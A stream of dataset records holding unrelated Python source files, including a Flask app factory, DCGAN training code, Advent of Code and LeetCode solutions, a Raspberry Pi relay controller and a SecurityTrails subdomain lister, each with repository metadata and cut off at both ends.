while(len(result) > 0):\n if(result[-3:] == b'END'):\n break\n result = self.conn.recv(65536)\n data += result\n \n return data.decode()\n\n #return ''.join(str(total_data))\n \n def sendMessage(self, message):\n #message = str(struct.pack('>I', len(str(message)))) + '|' + str(message)\n self.conn.sendall((str(message)+'|END').encode())\n \n def socketCloser(self):\n self.conn.close()\n \n def close(self):\n print('close - twig')\n self.conn.close()\n\n\n#twig = twig(5000)\n#twig.socketCloser()\nprint('Done - Twig')\n","repo_name":"MarcDAFrame/SynapSys","sub_path":"twig/TOOLKIT/twig.py","file_name":"twig.py","file_ext":"py","file_size_in_byte":1621,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"11402917452","text":"\"\"\"\nThe gametime module handles the global passage of time in the mud.\n\nIt also supplies some useful methods to convert between\nin-mud time and real-world time as well allows to get the\ntotal runtime of the server and the current uptime.\n\"\"\"\n\nfrom django.conf import settings\nfrom src.scripts.scripts import Script\nfrom src.scripts.models import ScriptDB\nfrom src.utils.create import create_script\nfrom src.utils import logger\n\n# name of script that keeps track of the time\n\nGAME_TIME_SCRIPT = \"sys_game_time\"\n\n# Speed-up factor of the in-game time compared\n# to real time.\n\nTIMEFACTOR = settings.TIME_FACTOR\n\n# Common real-life time measures, in seconds.\n# You should not change these.\n\nREAL_TICK = max(1.0, settings.TIME_TICK) #Smallest time unit (min 1s)\nREAL_MIN = 60.0 # seconds per minute in real world\n\n# Game-time units, in real-life seconds. These are supplied as\n# a convenient measure for determining the current in-game time,\n# e.g. when defining events. 
The words month, week and year can\n# of course mean whatever units of time are used in the game.\n\nTICK = REAL_TICK * TIMEFACTOR\nMIN = REAL_MIN * TIMEFACTOR\nHOUR = MIN * settings.TIME_MIN_PER_HOUR\nDAY = HOUR * settings.TIME_HOUR_PER_DAY\nWEEK = DAY * settings.TIME_DAY_PER_WEEK\nMONTH = WEEK * settings.TIME_WEEK_PER_MONTH\nYEAR = MONTH * settings.TIME_MONTH_PER_YEAR\n\nclass GameTime(Script):\n \"\"\"\n This sets up an script that keeps track of the\n in-game time and some other time units.\n \"\"\"\n def at_script_creation(self):\n \"\"\"\n Setup the script\n \"\"\"\n self.key = \"sys_game_time\"\n self.desc = \"Keeps track of the game time\"\n self.interval = REAL_MIN # update every minute\n self.persistent = True\n self.start_delay = True\n self.attr(\"game_time\", 0.0) #IC time\n self.attr(\"run_time\", 0.0) #OOC time\n self.attr(\"up_time\", 0.0) #OOC time\n\n def at_repeat(self):\n \"\"\"\n Called every minute to update the timers.\n \"\"\"\n # We store values as floats to avoid drift over time\n game_time = float(self.attr(\"game_time\"))\n run_time = float(self.attr(\"run_time\"))\n up_time = float(self.attr(\"up_time\"))\n self.attr(\"game_time\", game_time + MIN)\n self.attr(\"run_time\", run_time + REAL_MIN)\n self.attr(\"up_time\", up_time + REAL_MIN)\n\n def at_start(self):\n \"\"\"\n This is called once every server restart.\n We reset the up time.\n \"\"\"\n self.attr(\"up_time\", 0.0)\n\n# Access routines\n\ndef gametime_format(seconds):\n \"\"\"\n Converts the count in seconds into an integer tuple of the form\n (years, months, weeks, days, hours, minutes, seconds) where\n several of the entries may be 0.\n\n We want to keep a separate version of this (rather than just\n rescale the real time once and use the normal realtime_format\n below) since the admin might for example decide to change how many\n hours a 'day' is in their game etc.\n \"\"\"\n # have to re-multiply in the TIMEFACTOR\n # do this or we cancel the already counted\n # timefactor in the timer script...\n sec = int(seconds * TIMEFACTOR)\n years, sec = sec/YEAR, sec % YEAR\n months, sec = sec/MONTH, sec % MONTH\n weeks, sec = sec/WEEK, sec % WEEK\n days, sec = sec/DAY, sec % DAY\n hours, sec = sec/HOUR, sec % HOUR\n minutes, sec = sec/MIN, sec % MIN\n return (years, months, weeks, days, hours, minutes, sec)\n\ndef realtime_format(seconds):\n \"\"\"\n As gametime format, but with real time units\n \"\"\"\n sec = int(seconds)\n years, sec = sec/29030400, sec % 29030400\n months, sec = sec/2419200, sec % 2419200\n weeks, sec = sec/604800, sec % 604800\n days, sec = sec/86400, sec % 86400\n hours, sec = sec/3600, sec % 3600\n minutes, sec = sec/60, sec % 60\n return (years, months, weeks, days, hours, minutes, sec)\n\ndef gametime(format=False):\n \"\"\"\n Find the current in-game time (in seconds) since the start of the mud.\n The value returned from this function can be used to track the 'true'\n in-game time since only the time the game has actually been active will\n be adding up (ignoring downtimes).\n\n format - instead of returning result in seconds, format to (game-) time\n units.\n \"\"\"\n try:\n script = ScriptDB.objects.get_all_scripts(GAME_TIME_SCRIPT)[0]\n except (KeyError, IndexError):\n logger.log_trace(\"GameTime script not found.\")\n return\n # we return this as an integer (second-precision is good enough)\n game_time = int(script.attr(\"game_time\"))\n if format:\n return gametime_format(game_time)\n return game_time\n\ndef runtime(format=False):\n \"\"\"\n Get the total actual time the 
server has been running (minus downtimes)\n \"\"\"\n try:\n script = ScriptDB.objects.get_all_scripts(GAME_TIME_SCRIPT)[0]\n except (KeyError, IndexError):\n logger.log_trace(\"GameTime script not found.\")\n return\n # we return this as an integer (second-precision is good enough)\n run_time = int(script.attr(\"run_time\"))\n if format:\n return realtime_format(run_time)\n return run_time\n\ndef uptime(format=False):\n \"\"\"\n Get the actual time the server has been running since last downtime.\n \"\"\"\n try:\n script = ScriptDB.objects.get_all_scripts(GAME_TIME_SCRIPT)[0]\n except (KeyError, IndexError):\n logger.log_trace(\"GameTime script not found.\")\n return\n # we return this as an integer (second-precision is good enough)\n up_time = int(script.attr(\"up_time\"))\n if format:\n return realtime_format(up_time)\n return up_time\n\n\ndef gametime_to_realtime(secs=0, mins=0, hrs=0, days=0,\n weeks=0, months=0, yrs=0):\n \"\"\"\n This method helps to figure out the real-world time it will take until a in-game time\n has passed. E.g. if an event should take place a month later in-game, you will be able\n to find the number of real-world seconds this corresponds to (hint: Interval events deal\n with real life seconds).\n\n Example:\n gametime_to_realtime(days=2) -> number of seconds in real life from now after which\n 2 in-game days will have passed.\n \"\"\"\n real_time = secs/TIMEFACTOR + mins*MIN + hrs*HOUR + \\\n days*DAY + weeks*WEEK + months*MONTH + yrs*YEAR\n return real_time\n\ndef realtime_to_gametime(secs=0, mins=0, hrs=0, days=0,\n weeks=0, months=0, yrs=0):\n \"\"\"\n This method calculates how large an in-game time a real-world time interval would\n correspond to. This is usually a lot less interesting than the other way around.\n\n Example:\n realtime_to_gametime(days=2) -> number of game-world seconds\n corresponding to 2 real days.\n \"\"\"\n game_time = TIMEFACTOR * (secs + mins*60 + hrs*3600 + days*86400 + \\\n weeks*604800 + months*2419200 + yrs*29030400)\n return game_time\n\n\n# Time administration routines\n\ndef init_gametime():\n \"\"\"\n This is called once, when the server starts for the very first time.\n \"\"\"\n # create the GameTime script and start it\n game_time = create_script(GameTime)\n game_time.start()\n","repo_name":"YourCyborg/Sun-RPI","sub_path":"src/utils/gametime.py","file_name":"gametime.py","file_ext":"py","file_size_in_byte":7222,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"10394328943","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# coding=utf-8\n\"\"\"\n116. 
Populating Next Right Pointers in Each Node\n\"\"\"\nfrom laozhang import Node\n\n\nclass Solution:\n    \"\"\"\n    Approach:\n    1. First, connect the parent node's left and right children\n    2. Then, connect the nodes across neighbouring subtrees\n    3. Repeat recursively\n    \"\"\"\n\n    def connect(self, root: 'Node') -> 'Node':\n\n        def dfs(root: Node):\n            if root:\n                if root.left and root.right:\n                    # connect the left and right children\n                    root.left.next = root.right\n                    # key step: use the links built in step 1 to connect all nodes on the same level\n                    if root.next:\n                        root.right.next = root.next.left\n                dfs(root.left)\n                dfs(root.right)\n\n        dfs(root)\n        return root\n","repo_name":"jxnu-liguobin/cs-summary-reflection","sub_path":"python-leetcode/laozhang/tree/leetcode_116_.py","file_name":"leetcode_116_.py","file_ext":"py","file_size_in_byte":844,"program_lang":"python","lang":"zh","doc_type":"code","stars":524,"dataset":"github-code","pt":"79"} +{"seq_id":"20282946481","text":"from flask import Flask, jsonify\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_mail import Mail\nimport logging\nfrom logging.handlers import RotatingFileHandler\n\n\ndb = SQLAlchemy()\nmail = Mail()\n\n\ndef create_app(settings_override=None):\n    \"\"\"\n    Create a Flask application using the factory pattern.\n    :param settings_override: dict Override default app settings\n    :return: Flask app\n    \"\"\"\n    app = Flask(__name__, instance_relative_config=True)\n    app.config.from_object('config.settings')\n    app.config.from_pyfile('settings', silent=True)\n    if settings_override:\n        app.config.update(settings_override)\n    # Extensions\n    db.init_app(app)\n    mail.init_app(app)\n    # Logging\n    app_logger(app)\n    # Blueprints\n    from app.blueprints.user.routes import user\n    app.register_blueprint(user, url_prefix='/api/v1')\n\n    @app.route('/health')\n    def health_check():\n        app.logger.info('Got request to /health route')\n        return jsonify({'response': {'message': 'App is healthy'}}), 200\n\n    return app\n\n\ndef app_logger(app):\n    \"\"\"\n    Set up logger for the app.\n    :param app: The Flask app\n    :return: None\n    \"\"\"\n    format_string = (\n        '=================================================================\\n'\n        '[%(asctime)s] {%(pathname)s:%(lineno)d} %(levelname)s - %(message)s\\n'\n        '=================================================================\\n'\n    )\n    formatter = logging.Formatter(format_string)\n    handler = RotatingFileHandler(filename='logs/app.log', maxBytes=10000000,\n                                  backupCount=1)\n    handler.setLevel(app.config['LOG_LEVEL'])\n    handler.setFormatter(formatter)\n    app.logger.addHandler(handler)\n    return\n","repo_name":"mikaelm1/flask-api-boilerplate","sub_path":"app/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1730,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"79"} +{"seq_id":"2128835883","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\n\n\"\"\"\nProblem 1\n1. Write the following program\na. The user enters one of the digits 1-7, representing Monday through Sunday\nb. For input 1~5, print the matching \"周一\"~\"周五\" (Monday~Friday); if the input is 6 or 7, print \"周末\" (weekend)\nc. For input 0, exit the loop\nd. For any other input, prompt: \"输入有误,请重新输入!\" (invalid input, please enter again!)\nHint: this problem can be solved with if and while loops; the user's input also needs to be validated\n\"\"\"\n\n# def week():\n#     list_int = [1,2,3,4,5,6,7]\n#     list_day = [\"周一\",\"周二\",'周三','周四','周五','周末','周末']\n#     i=1\n#     while i<=7:\n#         day = input(\"请输入数字1-7:\")\n#         day = int(day)\n#         if day in list_int:\n#             print(list_day[day-1])\n#         elif day == 0:\n#             break\n#         else:\n#             print(\"输入有误,请重新输入!\")\n#         i += 1\n#\n# week()\n\n\n# dictionary version\n# def week():\n#     dict_day = {'1': \"周一\", \"2\": \"周二\", '3': '周三', '4': '周四', '5': '周五', '6': '周末', '7': '周末'}\n#     i = 1\n#     while i <= 7:\n#         day = input(\"请输入数字1-7:\")\n#         if day in dict_day.keys():\n#             print(dict_day[day])\n#             i += 1\n#         elif int(day) == 0:\n#             break\n#         else:\n#             print(\"输入有误,请重新输入!\")\n#\n# week()\n\n# the teacher's version\ndef week(day):\n    
dict_day = {'1': \"周一\", \"2\": \"周二\", '3': '周三', '4': '周四', '5': '周五', '6': '周末', '7': '周末'}\n    # the teacher checks for invalid input first\n    # if day not in '1234567':  # the teacher wrote it this way, but an input like 12 gives no prompt\n    # if int(day) not in [1,2,3,4,5,6,7]:  # I wrote it this way myself, but non-numeric input raises an error\n    #     print(\"输入有误,请重新输入!\")\n    # elif day in dict_day.keys():\n    #     print(dict_day[day])\n    if day in dict_day.keys():  # I feel writing it this way is better\n        print(dict_day[day])\n    else:\n        print(\"输入有误,请重新输入!\")\n\n# while True:\n#     day = input(\"请输入数字1-7:\")\n#     if day == '0':\n#         break\n#     else:\n#         week(day)\n'''\n请输入数字1-7:7\n周末\n请输入数字1-7:4\n周四\n请输入数字1-7:hha \n输入有误,请重新输入!\n请输入数字1-7:哈哈哈\n输入有误,请重新输入!\n请输入数字1-7:0\n\n'''\n\n'''\nProblem 2\n2. Write the following program\nRead a person's height (m) and weight (kg) and compute their BMI using the BMI formula (weight divided by the square of height)\na. For example: a 65 kg person with a height of 1.62 m has a BMI of: 65 / 1.62 ** 2 = 24.8\nb. Based on the BMI value, give the matching reminder\nbelow 18.5: underweight (过轻)\n18.5-25: normal (正常)\n25-28: overweight (过重)\n28-32: obese (肥胖)\nabove 32: severely obese (严重肥胖)\n'''\n\ndef bmi(height,weight):\n    height = float(height)\n    weight = float(weight)\n    BMI = weight/height**2\n    # print('BMI是{}'.format(BMI))\n    if BMI<18.5:\n        print(\"过轻\")\n    elif BMI>=18.5 and BMI<=25:\n        print(\"正常\")\n    elif BMI>25 and BMI<=28:\n        print(\"过重\")\n    elif BMI>28 and BMI<=32:\n        print(\"肥胖\")\n    elif BMI>32:\n        print(\"严重肥胖\")\n\n# height = input(\"请输入身高m:\")\n# weight = input('请输入体重kg:')\n# bmi(height,weight)\n\n\n'''\nProblem 3:\n\"\"\"\nRead a username and password from the keyboard and check whether they are correct; if they are, print a login-success message, otherwise report that the username or password is wrong.\na. Define a function that takes the entered username and password as parameters\nb. The correct account has username lemon and password best\n\"\"\"\n'''\ndef login(userName,pwd):\n    user = {'userName':'lemon','pwd':'best'}\n    if userName == user['userName'] and pwd == user['pwd']:\n        print(\"登录成功\")\n    else:\n        print(\"用户名或密码错误\")\n\n# userName=input(\"请输入用户名:\")\n# pwd=input(\"请输入密码:\")\n# login(userName,pwd)\n\n'''\nProblem 4\nFind the largest value in a list\nThe largest value in the list [13, 20, 42, 85, 9, 45] is 85\n'''\n# Method 1\ndef get_max(list_num):\n    max_num = 0\n    for i in list_num:\n        if i>max_num:\n            max_num=i\n    print(max_num)\n\nlist_1 = [13, 20, 42, 85, 9, 45]\nget_max(list_1)\n\n# Method 2\ndef get_max(list_num):\n    for i in range(len(list_num)-1):\n        if list_num[i]>list_num[i+1]:\n            list_num[i],list_num[i+1]=list_num[i+1],list_num[i]\n    print(list_num[-1])\n\nlist_1 = [13, 20, 42, 85, 9, 45]\nget_max(list_1)","repo_name":"he9mei/python_lemon","sub_path":"basic/basic3_1作业练习2.py","file_name":"basic3_1作业练习2.py","file_ext":"py","file_size_in_byte":4350,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"71908378174","text":"import pymongo\nimport RPi.GPIO as GPIO\nimport time\nfrom configparser import ConfigParser\n\nGPIO.setmode(GPIO.BCM)\n\n# Setup Config\nparser = ConfigParser()\nparser.read('/home/pi/sitamoto/config.ini')\n# Mongo Conf\nhost = str(parser.get('MONGO_CONF', 'host'))\ndbs = str(parser.get('MONGO_CONF', 'dbs'))\n\nmyclient = pymongo.MongoClient(host)\nmydb = myclient[dbs]\n\nrelay = mydb[\"relaystatus\"]\nleng = relay.count()\nleng += 1\nprint(leng)\nwhile True:\n    time.sleep(0.1)\n    for i in range(1, leng):\n        valuenya = relay.find_one({'_id': i})\n        GPIO.setup(valuenya['gpio'], GPIO.OUT)\n        if valuenya['status'] == 1:\n            GPIO.output(valuenya['gpio'], GPIO.HIGH)\n            # print(valuenya['gpio'])\n        else:\n            GPIO.output(valuenya['gpio'], GPIO.LOW)\n            # print(valuenya['gpio'])\n","repo_name":"hilmanzhy/singleccu","sub_path":"setrelay.py","file_name":"setrelay.py","file_ext":"py","file_size_in_byte":814,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"29501183740","text":"\ndef parse(inputfile):\n    return [line.strip('\\n') for line in open(inputfile).readlines()]\n\nopenchars = { '(', '[', '{', '<'}\nclosingchars = { ')', ']', '}', 
'>'}\n\nscores = {\n ')' : 3,\n ']' : 57,\n '}' : 1197,\n '>' : 25137,\n '(' : 1,\n '[' : 2,\n '{' : 3,\n '<' : 4\n}\n\ndef matches(opening, closing):\n if opening == '(' and closing == ')': return True\n if opening == '[' and closing == ']': return True\n if opening == '{' and closing == '}': return True\n if opening == '<' and closing == '>': return True\n return False\n\ndef process(chunk):\n stack = []\n corrupted = None\n\n for char in chunk:\n if char in openchars:\n stack.append(char)\n elif char in closingchars:\n if matches(stack[-1], char):\n stack.pop()\n else:\n corrupted = char\n break\n\n return stack, corrupted\n\ndef totalscore(stack):\n totalscore = 0\n for char in reversed(stack):\n totalscore *= 5\n totalscore += scores[char]\n return totalscore\n\ndef day10_part1(inputfile):\n chunks = parse(inputfile)\n\n score = 0\n for chunk in chunks:\n _, corrupted = process(chunk)\n if not corrupted: continue\n score += scores[corrupted]\n\n return score\n\ndef day10_part2(inputfile):\n chunks = parse(inputfile)\n\n totalscores = []\n for chunk in chunks:\n stack, corrupted = process(chunk)\n if corrupted: continue\n if len(stack) == 0: continue\n totalscores.append(totalscore(stack))\n\n return sorted(totalscores)[len(totalscores) // 2]\n","repo_name":"ErlendHaa/advent","sub_path":"2021/aoc2021/day10.py","file_name":"day10.py","file_ext":"py","file_size_in_byte":1605,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"23342907561","text":"# python ./make_new_action_file.py action_file_name\n\nimport sys\nkey = sys.argv[1]\nwith open(\"Action_Energy.pxd\") as epxd, open(\"Action_Energy.pyx\") as epyx:\n # pxd file\n tpxd = epxd.read()\n tpxd = tpxd.replace(\"Action_Energy\", key)\n\n # pyx file\n tpyx = epyx.read()\n tpyx = tpyx.replace(\"Action_Energy\", key)\n\n with open(\"./tmp/\" + key + \".pxd\", 'w') as newpxd, open(\"./tmp/\" + key + \".pyx\", 'w') as newpyx:\n newpxd.write((tpxd))\n newpyx.write((tpyx))\n","repo_name":"Amber-MD/pytraj","sub_path":"scripts/libcpptraj_tools/make_new_action_file.py","file_name":"make_new_action_file.py","file_ext":"py","file_size_in_byte":486,"program_lang":"python","lang":"en","doc_type":"code","stars":149,"dataset":"github-code","pt":"79"} +{"seq_id":"6099370102","text":"#!/usr/bin/env python3\n\nimport argparse\nimport requests\n\napikey = \"\"\nheaders = {\n \"accept\": \"application/json\",\n \"apikey\": apikey\n}\n\n\ndef enum_subdomains(args):\n domain = args.domain\n url = f\"https://api.securitytrails.com/v1/domain/{domain}/subdomains\"\n\n # Parse subdomains\n response = requests.get(url, headers=headers)\n results = response.json()\n subdomains = [f\"{i}.{domain}\" for i in results[\"subdomains\"]]\n\n # Write to file\n with open(\"subdomains.txt\", \"w\") as opened_file:\n for i in subdomains:\n opened_file.write(f\"{i}\\n\")\n\n print(\"Check your directory for subdomains.txt!\")\n return subdomains\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(\n description=\"Enumerates subdomains via the SecurityTrails API\")\n parser.add_argument(\n \"-d\", \"--domain\", help=\"input domain name, example format: example.com\", required=True)\n args = parser.parse_args()\n enum_subdomains(args)\n","repo_name":"expl0itabl3/securitytrails_enum","sub_path":"securitytrails_enum.py","file_name":"securitytrails_enum.py","file_ext":"py","file_size_in_byte":982,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"79"} 
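A hedged aside on the SecurityTrails snippet above: it assumes the request succeeds and that the JSON payload always carries a "subdomains" key. A minimal sketch of a safer parse, using only standard requests behavior (the timeout value and the empty-list fallback are illustrative choices, not part of the original script):

    response = requests.get(url, headers=headers, timeout=10)
    response.raise_for_status()  # surfaces 4xx/5xx, e.g. a missing or invalid apikey
    subdomains = [f"{i}.{domain}" for i in response.json().get("subdomains", [])]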
+{"seq_id":"30077150468","text":"import os\nimport argparse\nimport numpy as np\n\nfrom tqdm import tqdm\nfrom torch.optim import Adam\nfrom typing import Sequence\nfrom dpipe.io import save_numpy\nfrom dpipe.train.logging import TBLogger\n\nfrom sgan.utils import *\nfrom sgan.modules import *\nfrom sgan.data import CelebDataset, DataBatchIterator\nfrom sgan.utils import process_batch, generate_noise, inference_step, to_numpy, save_torch\n\n\ndef run_experiment(*, device, download: bool, n_epoch: int, batch_size: int, n_noise_channels: int\n , data_path: str, experiment_path: str):\n # path to save everything related to experiment\n data_path = Path(data_path).expanduser()\n experiment_path = Path(experiment_path).expanduser()\n # dataset and batch iterator\n dataset = CelebDataset(root=data_path, download=download)\n indices = list(range(len(dataset)))\n train_iterator = DataBatchIterator(dataset, indices, batch_size=batch_size)\n # models\n generator = Generator(in_channels=n_noise_channels).to(device)\n discriminator = Discriminator().to(device)\n generator.apply(init_weights)\n discriminator.apply(init_weights)\n\n # TODO: remove hardcode\n optimizer_parameters = dict(lr=1e-4, betas=(0.5, 0.99))\n generator_opt = Adam(generator.parameters(), **optimizer_parameters)\n discriminator_opt = Adam(discriminator.parameters(), **optimizer_parameters)\n\n fixed_noise = torch.randn(64, n_noise_channels, 1, 1, device=device)\n\n def predict_on_fixed_noise(epoch, prefix='fixed_noise', compression=1):\n predict = to_numpy(inference_step(fixed_noise, generator))\n os.makedirs(experiment_path / prefix, exist_ok=True)\n save_numpy(predict, experiment_path / prefix / f'{epoch}.npy.gz', compression=compression)\n\n def save_models(epoch):\n os.makedirs(experiment_path / f'generator/', exist_ok=True)\n os.makedirs(experiment_path / f'discriminator', exist_ok=True)\n save_torch(generator, experiment_path / f'generator/generator_{epoch}')\n save_torch(discriminator, experiment_path / f'discriminator/discriminator_{epoch}')\n\n logger = TBLogger(experiment_path / 'logs')\n epoch_callbacks = [predict_on_fixed_noise, save_models]\n\n train_dcgan(\n generator=generator,\n generator_opt=generator_opt,\n discriminator=discriminator,\n discriminator_opt=discriminator_opt,\n train_iterator=train_iterator,\n device=device,\n n_epoch=n_epoch,\n n_noise_channels=n_noise_channels,\n callbacks=epoch_callbacks,\n logger=logger\n )\n\n\ndef train_dcgan(*, generator, discriminator, train_iterator, device, n_epoch, generator_opt,\n discriminator_opt, n_noise_channels, callbacks: Sequence[Callable] = None, logger: TBLogger):\n generator = generator.to(device)\n discriminator = discriminator.to(device)\n criterion = F.binary_cross_entropy_with_logits\n\n callbacks = callbacks or []\n for epoch in tqdm(range(n_epoch)):\n generator_losses = []\n discriminator_losses_on_real = []\n discriminator_losses_on_fake = []\n\n with train_iterator as iterator:\n for real_batch, _ in iterator:\n real_batch = transform_gan(real_batch)\n batch_size = len(real_batch)\n discriminator_opt.zero_grad()\n # train discriminator on real\n real_loss = process_batch(real_batch, torch.ones(batch_size, 1, 1, 1), discriminator, criterion)\n # train discriminator on fake\n noise = generate_noise(batch_size, n_noise_channels, device)\n fake_batch = generator(noise)\n fake_loss = process_batch(fake_batch.detach(), torch.zeros(batch_size, 1, 1, 1), discriminator,\n criterion)\n discriminator_opt.step()\n # train generator\n generator_opt.zero_grad()\n 
target_for_generator = torch.ones(batch_size, 1, 1, 1)\n generator_loss = process_batch(fake_batch, target_for_generator, discriminator, criterion)\n generator_opt.step()\n\n generator_losses.append(generator_loss)\n discriminator_losses_on_real.append(real_loss)\n discriminator_losses_on_fake.append(fake_loss)\n\n # run callbacks\n for callback in callbacks:\n callback(epoch)\n\n losses = {'Generator': np.mean(generator_losses),\n 'Discriminator on fake': np.mean(discriminator_losses_on_fake),\n 'Discriminator on real': np.mean(discriminator_losses_on_real)\n }\n logger.policies(losses, epoch)\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('--device', required=True)\n parser.add_argument('--experiment_path', type=str, required=True)\n parser.add_argument('--download', dest='download', action='store_true')\n parser.add_argument('--no-download', dest='download', action='store_false')\n\n parser.add_argument('--batch_size', default=128, type=int)\n parser.add_argument('--n_epoch', default=30, type=int)\n parser.add_argument('--n_noise_channels', default=100, type=int)\n parser.add_argument('--data_path', default='~/celeba', type=str)\n\n args = parser.parse_args()\n run_experiment(**vars(args))\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"YanLogovskiy/steganography_pytorch","sub_path":"scripts/train_dcgan.py","file_name":"train_dcgan.py","file_ext":"py","file_size_in_byte":5382,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"40297598344","text":"import asyncio\nimport websockets\n\n\nasync def handle_connection(websocket, path):\n while True:\n msg = await websocket.recv()\n await websocket.send(msg)\n\nstart_server = websockets.serve(handle_connection, '0.0.0.0', 3000)\n\nasyncio.get_event_loop().run_until_complete(start_server)\nasyncio.get_event_loop().run_forever()\n","repo_name":"lelander/websocket-tests","sub_path":"python/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":335,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"39401992264","text":"from celery import shared_task\nfrom django.core.mail import send_mail\nfrom django.template.loader import render_to_string\n\n\n@shared_task\ndef send_confirmation_email(template_name: str, current_url: str, email: str, token_id: int, user_id: int):\n \"\"\"\n Отправляет письмо для подтверждения определенных действий.\n \"\"\"\n data = {\n 'current_site': str(current_url),\n 'token_id': str(token_id),\n 'user_id': str(user_id)\n }\n\n message = render_to_string(template_name, context=data)\n send_mail(\n subject='Пожалуйста, подтвердите почту',\n message=message,\n from_email='admin@ourweb.com',\n recipient_list=[email],\n fail_silently=True\n )\n","repo_name":"RRoxxxsii/forum-collab","sub_path":"backend/accounts/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":784,"program_lang":"python","lang":"ru","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"572313184","text":"import logging\nfrom typing import Any\n\nfrom django.core.management.base import BaseCommand, CommandParser\n\nfrom bk_honor.account.models import UserGroup\n\nlogger = logging.getLogger(__name__)\n\n\nclass Command(BaseCommand):\n\n help = \"adding usernames to group which is loaded by `python manage.py load_policies_from_yaml`\"\n\n def add_arguments(self, parser: CommandParser) -> None:\n parser.add_argument(\"--group\", type=str, help=\"Role 
key\")\n parser.add_argument(\"--usernames\", type=str, help=\"usernames, as 'foo,bar,baz'\")\n parser.add_argument(\"--append\", action=\"store_true\", help=\"whether override bindings\")\n\n def handle(self, *args: Any, **options: Any):\n group_key = options.get(\"group\")\n if not group_key:\n raise ValueError(\"role is required\")\n\n group = UserGroup.objects.get(id=group_key)\n usernames = options.get(\"usernames\", \"\").split(\",\")\n\n if options.get(\"append\"):\n already_bind = set(group.bindings)\n group.bindings = list(already_bind | set(usernames))\n else:\n group.bindings = list(set(usernames))\n\n group.save()\n","repo_name":"TencentBlueKing/blueking-honor","sub_path":"src/api/bk_honor/awards/management/commands/add_usernames_to_group.py","file_name":"add_usernames_to_group.py","file_ext":"py","file_size_in_byte":1147,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"14359437265","text":"\"\"\"\n메모이제이션을 위한 저장공간 dp를 배열로 선언하였고, 무게들의 합의 경우의 수가 아닌\n모든 무게들에 대해 공간을 확보했기 때문에 메모리공간 낭비가 심하다\n\"\"\"\n\nimport sys\n\n\nN, K = map(int, sys.stdin.readline().split())\nW, V = [0 for i in range(N)], [0 for i in range(N)]\nfor i in range(N):\n W[i], V[i] = map(int, sys.stdin.readline().split())\n\ndp = [[0 for _ in range(K + 1)] for _ in range(N + 1)]\n\nfor i in range(0, N + 1):\n for j in range(0, K + 1):\n if i == 0 or j == 0:\n dp[i][j] = 0\n elif W[i - 1] > j:\n dp[i][j] = dp[i - 1][j]\n else:\n dp[i][j] = max(dp[i - 1][j], dp[i - 1][j - W[i - 1]] + V[i - 1])\n\nprint(dp[N][K])","repo_name":"tunde02/Algorithms","sub_path":"Python/12865_list.py","file_name":"12865_list.py","file_ext":"py","file_size_in_byte":747,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"72501335936","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Dec 19 11:52:16 2016\n\n@author: chavdar\n\"\"\"\nfrom janome.tokenizer import Tokenizer\nimport numpy as np\nimport csv\n\ndef csvToNumpy(src):\n with open(src, 'r',encoding='utf8') as f:\n my_list = []\n reader = csv.reader(f)\n for row in reader:\n my_list.append(row)\n data_comments = np.array(my_list)\n return data_comments\n \nclass BagOfWords ():\n def __init__ (self):\n pass\n def createData(self,data_src,columns,splitData=None,topx_occuring_words=100,\n remove_words=[],destination=\"data.csv\",add_columns=[],description=[]):\n self.data = csvToNumpy(data_src)\n self.columns = columns\n if splitData:\n test_size = round(self.data.shape[0]*splitData)\n np.random.shuffle(self.data)\n self.testData = self.data[0:test_size,:]\n self.trainData = self.data[test_size:,:]\n else:\n self.trainData = self.data\n \n #\n print(\"getting wordcound and tokenized data from training set...\")\n self.wordCount , self.train_tokenized = self.wordCounDicAndTokenizedData(self.trainData)\n print(\"getting wordcound and tokenized data from test set...\")\n self.test_tokenized = self.wordCounDicAndTokenizedData(self.testData)[1]\n print(\"creating bag of words from train data...\")\n self.bagOfWords = self.createBag(topx_occuring_words,remove_words,self.wordCount)\n print(\"vectorizing train data...\")\n self.train_vectorized = self.vectorize(self.train_tokenized,self.bagOfWords)\n print(\"vectorizing test data...\")\n self.test_vectorized = self.vectorize(self.test_tokenized,self.bagOfWords)\n print(\"saving data as csv...\")\n 
